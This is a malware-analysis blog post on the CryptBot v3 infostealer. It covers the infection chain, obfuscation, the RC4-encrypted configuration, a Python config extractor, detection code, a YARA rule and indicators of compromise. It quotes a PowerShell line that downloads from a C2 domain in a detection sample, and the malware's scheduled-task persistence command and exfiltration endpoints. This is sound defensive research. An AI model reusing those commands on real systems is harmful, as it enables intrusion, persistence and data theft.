Tags: Malware, Reverse Engineering, CryptBot, Infostealer

CryptBot v3 (Final) - Malware Analysis

2025-08-30
SynThreats Team
5 min read

Overview

CryptBot is a persistent infostealer malware targeting Windows systems, first identified in 2019. Its primary goal is to steal sensitive data, including browser credentials, cryptocurrency wallets, cookies, credit card details, and system screenshots. Distributed via phishing emails, cracked software sites, or malicious LNK files, CryptBot has evolved significantly. This analysis examines version 3 (CryptBot v3.0), which builds on the techniques observed in v2 (see our previous analysis), introducing a new compiler, enhanced obfuscation, and refined infection chains.

Key updates in v3 include a switch to the GNU linker ld (GNU Binutils 2.40), potentially to evade signature-based detection, a new RC4 key (LkgwUi), and the use of advanced obfuscation techniques, possibly leveraging the gimple obfuscator. The malware retains its core functionality, including RC4 encryption for data exfiltration, but introduces new C2 domains and modified persistence mechanisms. Variants continue to show code reuse with other stealers, often referred to as "Yet Another Silly Stealer (YASS)."

What is RC4 Encryption?

As discussed in our CryptBot v2 analysis, RC4 (Rivest Cipher 4) is a stream cipher used by CryptBot to encrypt stolen data before exfiltration to command-and-control (C2) servers. Its simplicity and speed make it ideal for malware, though its cryptographic weaknesses remain a concern. In v3, the RC4 implementation remains consistent, but the key has changed to LkgwUi.

Analysis

Activities

  • Data Theft: Steals data from web browsers (e.g., Chrome, Edge, Firefox), cryptocurrency wallets (e.g., MetaMask, Phantom), user directories (e.g., Desktop, Documents), and system information such as installed software and screenshots.
  • Evasion Techniques: Employs anti-analysis checks, including environment variable inspection (e.g., LocalAppData, AppData), file existence checks, and virtual machine detection, enhanced by heavy obfuscation in the binary.
  • Persistence: Uses scheduled tasks (e.g., schtasks /create /tn \Service\Data /tr) to maintain persistence across reboots, consistent with v2 but with updated paths like \ServiceData\Clip.au3.
  • Backdoor Deployment: Downloads remote scripts, potentially NetSupport RAT, via PowerShell from domains like analforeverlovyu.top, enabling persistent access.
  • Infection Chain: Initiates with malicious LNK files executing PowerShell, which runs obfuscated scripts to download ZIP archives. These archives contain loaders, such as Delphi-based IDATLOADER, injecting shellcode to deploy the stealer.
  • Data Exfiltration: Encrypts stolen data in ZIP archives using RC4 and uploads them to C2 servers via HTTP POST requests to endpoints like /v1/upload.php.
  • Frequent Updates: CryptBot v3 frequently updates its variants, incorporating code reuse and obfuscation to evade detection.
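As an added example (not part of the original analysis), the following Python detection logic checks process-creation events for the scheduled-task persistence command and the C2 domains named above. The event format and the sample command lines are constructed for the example, not captured telemetry; the `/du` and `/ri` interpretation follows the documented schtasks switches (duration in HHHH:MM, repetition interval in minutes).

```python
import re

# Indicators taken from the decrypted v3 configuration discussed in this post.
C2_DOMAINS = ("tventyvx20pn.top", "analforeverlovyu.top")
DROPPED_PATHS = (r"\ServiceData\Clip.au3", r"\ServiceData\Clip.exe")

TASK_NAME_RE = re.compile(r'/tn\s+"?\\Service\\Data\b', re.IGNORECASE)
SC_ONCE_RE = re.compile(r"/sc\s+once\b", re.IGNORECASE)
RI_RE = re.compile(r"/ri\s+(\d+)", re.IGNORECASE)
DU_RE = re.compile(r"/du\s+(\d{1,4}):(\d{2})", re.IGNORECASE)

# Constructed Sysmon-style process-creation events (not real telemetry).
TASK_CMD = (r'cmd.exe /c schtasks /create /tn \Service\Data /tr '
            r'"C:\Users\alice\AppData\Local\ServiceData\Clip.exe" '
            r'"C:\Users\alice\AppData\Local\ServiceData\Clip.au3" '
            r'/st 00:01 /du 9800:59 /sc once /ri 1 /f')
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": TASK_CMD},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "\Microsoft\Windows\Backup\Nightly" '
                    r'/tr C:\backup.exe /sc daily /st 02:00'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -c iwr http://analforeverlovyu.top/x -OutFile $env:TEMP\a.zip"},
    {"Image": r"C:\Program Files\Git\bin\git.exe", "CommandLine": "git pull"},
]


def persistence_findings(cmdline):
    """Return the reasons a command line matches CryptBot v3's scheduled-task persistence."""
    reasons = []
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return reasons
    if TASK_NAME_RE.search(cmdline):
        reasons.append("task name \\Service\\Data")
    for path in DROPPED_PATHS:
        if path.lower() in low:
            reasons.append("drops " + path)
    # A /sc once task with a short /ri (minutes) and a multi-day /du (HHHH:MM)
    # re-runs every few minutes for the whole window: persistence in disguise.
    ri, du = RI_RE.search(cmdline), DU_RE.search(cmdline)
    if SC_ONCE_RE.search(cmdline) and ri and du:
        interval, hours = int(ri.group(1)), int(du.group(1))
        if interval <= 5 and hours >= 24:
            reasons.append(f"once-task repeating every {interval} min for {hours} h")
    return reasons


def c2_findings(cmdline):
    """Return the known C2 domains referenced by a command line."""
    low = cmdline.lower()
    return [d for d in C2_DOMAINS if d in low]


def scan_events(events):
    """Evaluate process-creation events; return (index, reasons) for each hit."""
    hits = []
    for idx, event in enumerate(events):
        cmd = event.get("CommandLine", "")
        reasons = persistence_findings(cmd) + [f"contacts {d}" for d in c2_findings(cmd)]
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan_events(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], reasons)
```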

Programming Language

The malware is written in C/C++, as indicated by low-level Windows API calls and memory management patterns observed during analysis with IDA Pro. Unlike v2, which used Microsoft’s linker, v3 is compiled with GNU linker ld (GNU Binutils 2.40), likely to disrupt signature-based tracking. Dynamic imports from libraries like kernel32.dll, wininet.dll, and crypt32.dll are resolved at runtime, consistent with v2.

```text
Linker: GNU linker ld (GNU Binutils)
Description: Linker - GNU linker ld (GNU Binutils)(2.40)[GUI32]
Info: GUI32
Version: 2.40
```

Static Analysis

String Extraction

Extracting wide strings from the binary reveals stealer-related indicators, many of which overlap with v2, such as:

```text
UID:
UserName:
ComputerName:
DateTime:
UserAgent:
Keyboard Languages:
Display Resolution:
CPU:
RAM:
GPU:
Installed Apps:
```

Additional strings include build artifacts exposing the development environment:

```text
/home/anal/bot/zip_include/zip.c
/home/anal/bot/zip_include/miniz.h
```

These paths suggest a Linux-based build environment, a shift from v2, potentially to obscure the malware’s origin.

Main Function

The main function in v3 is heavily obfuscated, with IDA Pro reporting "sorry, this node is too big to display" due to extensive data initialization. The function moves data dynamically into the .data section, as shown below:

This extensive data initialization is stored in the .data section (e.g., dword_807140 to dword_80718C):

```nasm
.text:005AF200                 push    ebp
.text:005AF201                 mov     ebp, esp
.text:005AF203                 push    edi
.text:005AF204                 push    esi
.text:005AF205                 push    ebx
.text:005AF206                 and     esp, 0FFFFFFF0h
.text:005AF209                 sub     esp, 0B0h
.text:005AF20F                 mov     ebx, [ebp+argc]
.text:005AF212                 mov     edi, [ebp+argv]
.text:005AF215                 mov     esi, [ebp+envp]
.text:005AF218                 call    sub_401780
.text:005AF21D                 mov     edx, 0FFFFCE8Ch
.text:005AF222                 mov     ecx, 4
.text:005AF227                 mov     dword_80A0A0, 2F5Eh
.text:005AF231                 mov     eax, ds:pbBuffer
.text:005AF236                 mov     [esp+0BCh+var_10], eax
.text:005AF23D                 xor     eax, eax
.text:005AF23F                 mov     eax, 29B9h
.text:005AF244                 mov     dword_807120, 17AEh
.text:005AF24E                 mov     dword_807140, 0AB0E1B75h
.text:005AF258                 mov     dword_807144, 3686Ch
.text:005AF262                 mov     dword_807148, 65CC42F2h
.text:005AF26C                 mov     dword_80714C, 8C014825h
.text:005AF276                 mov     dword_807150, 0BF4C4495h
.text:005AF280                 mov     dword_807154, 8AFBAE0Eh
.text:005AF28A                 mov     dword_807158, 0C97E436Eh
.text:005AF294                 mov     dword_80715C, 1E64401Ah
.text:005AF29E                 mov     dword_807160, 0CEBE992Dh
.text:005AF2A8                 mov     dword_807164, 9289F207h
.text:005AF2B2                 mov     dword_807168, 0E79964D6h
.text:005AF2BC                 mov     dword_80716C, 91D43309h
.text:005AF2C6                 mov     dword_807170, 7670A9C1h
.text:005AF2D0                 mov     dword_807174, 6ED804Dh
.text:005AF2DA                 mov     dword_807178, 299A7B86h
.text:005AF2E4                 mov     dword_80717C, 57DDDD62h
.text:005AF2EE                 mov     dword_807180, 0D8D70F48h
.text:005AF2F8                 mov     dword_807184, 0A1105B5Ah
.text:005AF302                 mov     dword_807188, 2F458880h
.text:005AF30C                 mov     dword_80718C, 3F031802h
```

Deeper analysis suggests the use of an obfuscator, potentially gimple (see hellscape).

```nasm
.text:006C392D                 vzeroupper
.text:006C3930                 call    sub_425100
.text:006C3935                 mov     eax, [esp+0BCh+var_10]
```

The function ends with a call to sub_425100, renamed mw_main_1 for clarity:

```nasm
.text:006C3930                 call    mw_main_1
```

There are far too many calls and too much obfuscation noise in this binary to follow statically, so let's move on to dynamic analysis.

Dynamic Analysis

Dynamic analysis was performed using x32dbg, setting breakpoints on key functions:

  • main
  • strcmp
  • strlen
  • strncmp
  • strncpy

Breakpoints were set as follows:


```text
Type=Software
Address=000714A0
Module/Label/Exception=<crypt.exe.OptionalHeader.AddressOfEntryPoint>
State=One-time
Disassembly=mov dword ptr ds:[9B3070],1
Summary=entry breakpoint
...
Address=0021F200
Module/Label/Exception=<crypt.exe.main>
State=Enabled
Disassembly=push ebp
...
Address=777796A0
Module/Label/Exception=<msvcrt.dll.strcmp>
State=Enabled
Disassembly=mov edx,dword ptr ss:[esp+4]
...
```

The entry point (0x00070000) was aligned with IDA Pro for consistency.


Running until the strlen breakpoint revealed the RC4 key LkgwUi at 011FF5C0.


The encrypted blob at 0x00475960 was extracted and decrypted, confirming the configuration’s similarity to v2.


RC4 Implementation

The RC4 encryption routine remains consistent with v2, using a new key (LkgwUi). The implementation is similar to the mw_rc4 function described in our previous analysis. The key is identified during dynamic analysis at address 011FF570:

```text
"LkgwUi"
```

Manual Decryption

To decrypt the configuration, extract the encrypted blob at address 0x00475960 using x32dbg or IDA Pro:

```bash
# In x32dbg, navigate to 0x00475960 and extract bytes
```


In CyberChef:

  1. Input the extracted hex content.
  2. Apply the RC4 recipe with the passphrase LkgwUi, setting Input to Hex and Output to Latin1.


Decrypted Config:

```text
tventyvx20pn.top
\nuSONyiIRP
LkgwUi
\ServiceData
\ServiceData\Clip.au3
\ServiceData\Clip.exe
/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f
GET
POST
/index.php
/gate.php
/zip.php
/v1/upload.php
curl/8.0.1
NULL
NULL
NULL
Content-Length: %lu
HTTP
HTTPS
"encrypted_key":"
DPAPI
DISPLAY
$CREEN.JPEG
ScreenShot.jpeg
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Apps
Browsers
Files
Wallets
UserID.txt
Debug.txt
End.txt
log.txt
User's Computer Information.txt
Desktop
Others
NULL
An error occurred while starting the application (0xc000007b). To exit the application, click OK.
System Error
NULL
ComSpec
LocalAppData
AppData
Temp
UserProfile
NULL
NULL
analforeverlovyu.top
NULL
kernel32.dll
ntdll.dll
user32.dll
shlwapi.dll
msvcrt.dll
shell32.dll
wininet.dll
winhttp.dll
ws2_32.dll
urlmon.dll
crypt32.dll
gdi32.dll
gdiplus.dll
ole32.dll
cabinet.dll
advpack.dll
advapi32.dll
rstrtmgr.dll
winsqlite3.dll
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
GetModuleHandleA
GetModuleHandleW
GetModuleHandleExA
GetModuleHandleExW
LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
GetProcAddress
FreeLibrary
NULL
MessageBoxA
MessageBoxW
NULL
CreateThread
CreateRemoteThread
CreateRemoteThreadEx
OpenThread
OpenProcess
GetThreadId
GetProcessId
CreateMutexA
CreateMutexW
ReleaseMutex
WaitForSingleObject
CreateProcessA
CreateProcessW
ShellExecuteA
ShellExecuteW
WinExec
NULL
HeapCreate
GetProcessHeap
HeapAlloc
HeapReAlloc
HeapSize
HeapFree
NULL
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualFreeEx
VirtualProtect
VirtualProtectEx
NULL
LocalAlloc
LocalFree
NULL
calloc
malloc
realloc
free
NULL
CreateFileA
CreateFileW
ReadFile
WriteFile
SetFilePointer
SetFilePointerEx
GetFileAttributesA
GetFileAttributesW
GetFileAttributesExA
GetFileAttributesExW
GetFileSize
GetFileSizeEx
CreateFileMappingA
CreateFileMappingW
MapViewOfFile
UnmapViewOfFile
CloseHandle
NULL
SHGetFolderPathA
SHGetFolderPathW
GetEnvironmentVariableA
GetEnvironmentVariableW
ExpandEnvironmentStringsA
ExpandEnvironmentStringsW
GetModuleFileNameA
GetModuleFileNameW
GetModuleFileNameExA
GetModuleFileNameExW
GetCurrentDirectoryA
GetCurrentDirectoryW
GetSystemDirectoryA
GetSystemDirectoryW
GetSystemWow64DirectoryA
GetSystemWow64DirectoryW
GetTempPathA
GetTempPathW
GetTempFileNameA
GetTempFileNameW
NULL
URLDownloadToFileA
URLDownloadToFileW
URLOpenBlockingStreamA
URLOpenBlockingStreamW
CoInitialize
CoUninitialize
NULL
WinHttpCrackUrl
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpReadDataEx
WinHttpQueryHeaders
WinHttpQueryOption
WinHttpCloseHandle
NULL
InternetCrackUrlA
InternetOpenUrlA
InternetOpenA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
InternetReadFile
InternetReadFileExA
InternetCloseHandle
NULL
InternetCrackUrlW
InternetOpenUrlW
InternetOpenW
InternetConnectW
HttpOpenRequestW
HttpSendRequestW
HttpQueryInfoW
InternetReadFile
InternetReadFileExW
InternetCloseHandle
NULL
WSAStartup
socket
htons
inet_addr
bind
listen
accept
recv
recvfrom
send
closesocket
WSAGetLastError
WSACleanup
NULL
FindFirstFileNameA
FindFirstFileNameW
FindNextFileNameA
FindNextFileNameW
FindFirstFileA
FindFirstFileW
FindFirstFileExA
FindFirstFileExW
FindNextFileA
FindNextFileW
FindClose
NULL
RegOpenKeyExA
RegOpenKeyExW
RegQueryInfoKeyA
RegQueryInfoKeyW
RegEnumKeyExA
RegEnumKeyExW
RegQueryValueExA
RegQueryValueExW
RegCloseKey
NULL
wnsprintfA
wnsprintfW
StrStrIA
StrStrIW
PathIsDirectoryA
PathIsDirectoryW
PathFileExistsA
PathFileExistsW
SHAnsiToUnicode
SHUnicodeToAnsi
NULL
wsprintfA
wsprintfW
_snprintf
_snwprintf
swprintf
sprintf
_swprintf
sprintf_s
swprintf_s
_snwprintf_s
_vscprintf
vsnprintf
_vscwprintf
vswprintf
NULL
WideCharToMultiByte
MultiByteToWideChar
GetComputerNameA
GetComputerNameW
GetUserNameA
GetUserNameW
CopyFileA
CopyFileW
CopyFileExA
CopyFileExW
DeleteFileA
DeleteFileW
MoveFileA
MoveFileW
MoveFileExA
MoveFileExW
CreateDirectoryA
CreateDirectoryW
RemoveDirectoryA
RemoveDirectoryW
NULL
EnumDisplaySettingsA
EnumDisplaySettingsW
CreateDCA
CreateDCW
CreateCompatibleDC
CreateCompatibleBitmap
SelectObject
BitBlt
GetDeviceCaps
StretchBlt
GetObjectA
GetObjectW
GetDIBits
ReleaseDC
DeleteDC
NULL
GdiplusStartup
GdipGetImageEncoders
GdipGetImageEncodersSize
GdipLoadImageFromFile
GdipCreateBitmapFromHBITMAP
GdipSaveImageToFile
GdipSaveImageToStream
GetBitmapBits
DeleteObject
GdiplusShutdown
NULL
SHCreateMemStream
CreateStreamOnHGlobal
SaveImageToStream
IStream_Size
IStream_Reset
IStream_Read
NULL
ExtractFilesA
ExtractFilesW
Extract
FCICreate
FCIAddFile
FCIFlushFolder
FCIFlushCabinet
FCIDestroy
NULL
CryptUnprotectData
GetTickCount
GetTickCount64
QueryPerformanceCounter
CreateToolhelp32Snapshot
Process32FirstA
Process32FirstW
Process32NextA
Process32NextW
GetLocaleInfoA
GetLocaleInfoW
GetLogicalDriveStringsA
GetLogicalDriveStringsW
GetDriveTypeA
GetDriveTypeW
GetVolumeInformationA
GetVolumeInformationW
GetDiskFreeSpaceExA
GetDiskFreeSpaceExW
ReadConsoleA
ReadConsoleW
WriteConsoleA
WriteConsoleW
GetCommandLineA
GetCommandLineW
GetConsoleMode
printf
wprintf
atoi
_wtoi
FileTimeToSystemTime
GetFileInformationByHandle
IsBadReadPtr
SystemTimeToFileTime
GetTimeZoneInformation
GetLocalTime
GlobalMemoryStatusEx
DuplicateHandle
GetCurrentProcess
GetCurrentThread
GetUserDefaultLocaleName
GetSystemMetrics
GetSystemInfo
GetNativeSystemInfo
IsWow64Process
IsWow64Process2
GetKeyboardLayoutList
RtlGetVersion
GetLastError
SetErrorMode
abs
clock
OpenProcess
TerminateProcess
RmStartSession
RmRegisterResources
RmGetList
RmEndSession
strtod
isspace
Sleep
SleepEx
GetExitCodeThread
ExitThread
ExitProcess
FileTimeToDosDateTime
WinHttpSetOption
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
```

This configuration closely resembles v2’s, with updated C2 domains (e.g., tventyvx20pn.top, analforeverlovyu.top) and a new file extension (Clip.au3).

Malware Configuration Extractor

The Python script for extracting and decrypting the configuration is adapted from v2, updated for the new RC4 key (LkgwUi) and blob address (0x00475960). The script assumes the encrypted blob is extracted as hex.

```python
import argparse
import re


def rc4(key, data):
    """
    RC4 decryption implementation based on CryptBot's mw_rc4 function.
    Key: The encryption key (e.g., 'LkgwUi').
    Data: The encrypted blob as bytes.
    Returns: Decrypted data as a bytearray.
    """
    S = list(range(256))
    j = 0
    out = bytearray()

    # KSA (Key Scheduling Algorithm)
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # PRGA (Pseudo-Random Generation Algorithm)
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        out.append(byte ^ k)

    return out


def extract_config(binary_path, key_str='LkgwUi', blob_size=6500):
    """
    Extracts and decrypts the configuration from a CryptBot v3 binary.
    binary_path: Path to the binary file.
    key_str: RC4 key (default: 'LkgwUi').
    blob_size: Size of the encrypted blob (default: 6500).
    Returns: Decrypted configuration as a string or error message.
    """
    key = bytearray(key_str.encode('utf-8'))

    try:
        with open(binary_path, 'rb') as f:
            binary_data = f.read()
    except OSError as e:
        return f"Error reading binary file: {e}"

    # Search for the RC4 key in the binary
    key_pattern = re.escape(key_str).encode('utf-8')
    key_match = re.search(key_pattern, binary_data)

    if not key_match:
        return f"Error: RC4 key '{key_str}' not found in binary."

    # Locate the encrypted blob (0x00475960). Subtracting the image base gives
    # an RVA, which only equals the file offset when the section's raw and
    # virtual addresses coincide; otherwise dump the blob from memory in x32dbg.
    base_address = 0x400000  # Typical PE base address
    target_offset = 0x00475960 - base_address
    if target_offset + blob_size <= len(binary_data):
        blob_start = target_offset
    else:
        blob_start = key_match.end() + 10  # Heuristic offset

    if blob_start + blob_size > len(binary_data):
        return "Error: Blob size exceeds binary length."

    # Extract and decrypt the blob
    encrypted_blob = binary_data[blob_start:blob_start + blob_size]
    decrypted = rc4(key, encrypted_blob)

    # Latin1 maps every byte value, so decoding cannot fail; the config is a
    # sequence of null-terminated strings, emitted one per line.
    config = decrypted.decode('latin1').rstrip('\x00')
    config_lines = [line for line in config.split('\x00') if line]
    return '\n'.join(config_lines)


def main():
    parser = argparse.ArgumentParser(description="CryptBot v3 Configuration Extractor")
    parser.add_argument("binary", help="Path to the CryptBot binary file")
    parser.add_argument("--key", default="LkgwUi", help="RC4 key (default: LkgwUi)")
    parser.add_argument("--size", type=int, default=6500, help="Size of encrypted blob (default: 6500)")
    args = parser.parse_args()

    config = extract_config(args.binary, args.key, args.size)
    print("Decrypted Configuration:")
    print(config)


if __name__ == "__main__":
    main()
```

Explanation of the Extractor

  • RC4 Function: Replicates the mw_rc4 function from v2, performing KSA and PRGA for decryption.
  • Blob Extraction: Locates the encrypted configuration at 0x00475960. Falls back to a heuristic offset if the address is invalid.
  • Output: Decodes the decrypted configuration as Latin1, cleaning null bytes. Returns hex if decoding fails.
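As an added example (not code from the post or from the malware), the following Python parser post-processes the null-separated entries the extractor prints into triage fields: C2 domains and candidate URLs, the persistence task name, dropped paths, imported DLLs and the API names resolved at runtime. The embedded input is a constructed excerpt of the decrypted listing above, and the classification by string shape and position (APIs being the bare identifiers that follow the DLL table) is an assumption about the layout.

```python
import re

# Constructed excerpt of the decrypted v3 configuration, in the order the
# extractor prints it ("NULL" separators kept); the real output carries
# several hundred more API names.
SAMPLE_CONFIG = [
    "tventyvx20pn.top", r"\nuSONyiIRP", "LkgwUi", r"\ServiceData",
    r"\ServiceData\Clip.au3", r"\ServiceData\Clip.exe",
    r'/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f',
    "GET", "POST", "/index.php", "/gate.php", "/zip.php", "/v1/upload.php", "curl/8.0.1",
    "NULL", "NULL", "NULL", "Content-Length: %lu", "HTTP", "HTTPS",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
    "UserID.txt", "Debug.txt", "NULL", "ComSpec", "LocalAppData", "AppData", "NULL", "NULL",
    "analforeverlovyu.top", "NULL", "kernel32.dll", "wininet.dll", "crypt32.dll", "NULL",
    "LoadLibraryA", "GetProcAddress", "CryptUnprotectData", "WinHttpSendRequest", "NULL",
]

DOMAIN_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")
NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def parse_config(entries, rc4_key="LkgwUi"):
    """Classify the null-separated config entries into triage-ready fields."""
    cfg = {"c2_domains": [], "endpoints": [], "http_methods": [], "user_agents": [],
           "paths": [], "files": [], "dlls": [], "apis": [], "task_command": None,
           "task_name": None, "key_present": False}
    for entry in entries:
        if entry == "NULL":
            continue
        low = entry.lower()
        if entry == rc4_key:
            cfg["key_present"] = True
        elif low.endswith(".dll"):
            cfg["dlls"].append(entry)
        elif entry.startswith("/c schtasks"):
            cfg["task_command"] = entry
            match = re.search(r"/tn\s+(\S+)", entry)
            cfg["task_name"] = match.group(1) if match else None
        elif entry.startswith("\\"):
            cfg["paths"].append(entry)
        elif low.endswith((".txt", ".jpeg")):
            cfg["files"].append(entry)
        elif DOMAIN_RE.match(low):
            cfg["c2_domains"].append(entry)
        elif entry.startswith("/"):
            cfg["endpoints"].append(entry)
        elif entry in ("GET", "POST"):
            cfg["http_methods"].append(entry)
        elif entry.startswith(("Mozilla/", "curl/")):
            cfg["user_agents"].append(entry)
        elif NAME_RE.match(entry) and cfg["dlls"]:
            # Bare identifiers after the DLL table are the APIs resolved at runtime.
            cfg["apis"].append(entry)
    # Candidate C2 URLs: every known domain crossed with every endpoint.
    cfg["c2_urls"] = [f"http://{d}{p}" for d in cfg["c2_domains"] for p in cfg["endpoints"]]
    return cfg


if __name__ == "__main__":
    parsed = parse_config(SAMPLE_CONFIG)
    for field in ("c2_domains", "c2_urls", "task_name", "paths", "dlls", "apis"):
        print(f"{field}: {parsed[field]}")
```

Feed it the extractor's output split on newlines to get the same fields for a fresh sample.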

Yara Rule

The Yara rule for v3 is adapted from v2 to account for the new RC4 key and C2 domains, maintaining strict conditions to reduce false positives.

```yara
rule CryptBot_v3 {
    meta:
        author = "0xw43l"
        description = "Detects CryptBot v3 infostealer based on RC4 key, C2 strings, and configuration artifacts"
        reference = "https://0xw43l.com/posts/CryptBot-0x03/"
        date = "2025-08-30"

    strings:
        // RC4 Key
        $key = "LkgwUi" ascii fullword

        // C2 Domains and Paths
        $c2_1 = "tventyvx20pn.top" ascii
        $c2_2 = "analforeverlovyu.top" ascii
        $c2_3 = "/index.php" ascii
        $c2_4 = "/gate.php" ascii
        $c2_5 = "/zip.php" ascii
        $c2_6 = "/v1/upload.php" ascii
        $path_1 = "\\nuSONyiIRP" ascii
        $path_2 = "\\ServiceData" ascii
        $path_3 = "\\ServiceData\\Clip.au3" ascii
        $path_4 = "\\ServiceData\\Clip.exe" ascii

        // Persistence Command
        $persist = "/c schtasks /create /tn \\Service\\Data /tr" ascii

        // Stealer Strings
        $s1 = "UID:" ascii
        $s2 = "UserName:" ascii
        $s3 = "ComputerName:" ascii
        $s4 = "DateTime:" ascii
        $s5 = "UserAgent:" ascii
        $s6 = "Keyboard Languages:" ascii
        $s7 = "Display Resolution:" ascii
        $s8 = "CPU:" ascii
        $s9 = "RAM:" ascii
        $s10 = "GPU:" ascii
        $s11 = "Installed Apps:" ascii

    condition:
        $key and (2 of ($c2_*)) and (2 of ($path_*)) and $persist and 6 of ($s*)
}
```

Yara Rule Enhancements

  • Updated Strings: Includes new RC4 key (LkgwUi) and C2 domains (e.g., tventyvx20pn.top).
  • Stricter Conditions: Requires at least two C2-related strings and two path-related strings.
  • Metadata: Updated date and reference for v3.

Samples (SHA256 Hashes)

  • Core Malware:
    • ff10143803f39c6c08b2fbe846d990b92c6d1b71e27f89bca69ab9331945b14a (Analyzed in this report)
  • Note: Additional sample hashes for v2 can be found in our previous analysis.

MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1204.002 | User Execution: Malicious File |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Execution | T1059.007 | Command and Scripting Interpreter: JavaScript/JScript |
| Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
| Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers |
| Collection | T1005 | Data from Local System |
| Collection | T1119 | Automated Collection |
| Collection | T1113 | Screen Capture |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
| Command and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |

Indicators of Compromise (IOCs)

| Type | Indicator | Description |
|---|---|---|
| Domain | tventyvx20pn.top | C2 Domain |
| Domain | analforeverlovyu.top | C2 Domain |
| Path | \nuSONyiIRP | Persistence Path |
| Path | \ServiceData | Persistence Path |
| Path | \ServiceData\Clip.au3 | Dropped File |
| Path | \ServiceData\Clip.exe | Dropped File |
| Hash (SHA256) | ff10143803f39c6c08b2fbe846d990b92c6d1b71e27f89bca69ab9331945b14a | Core Malware |
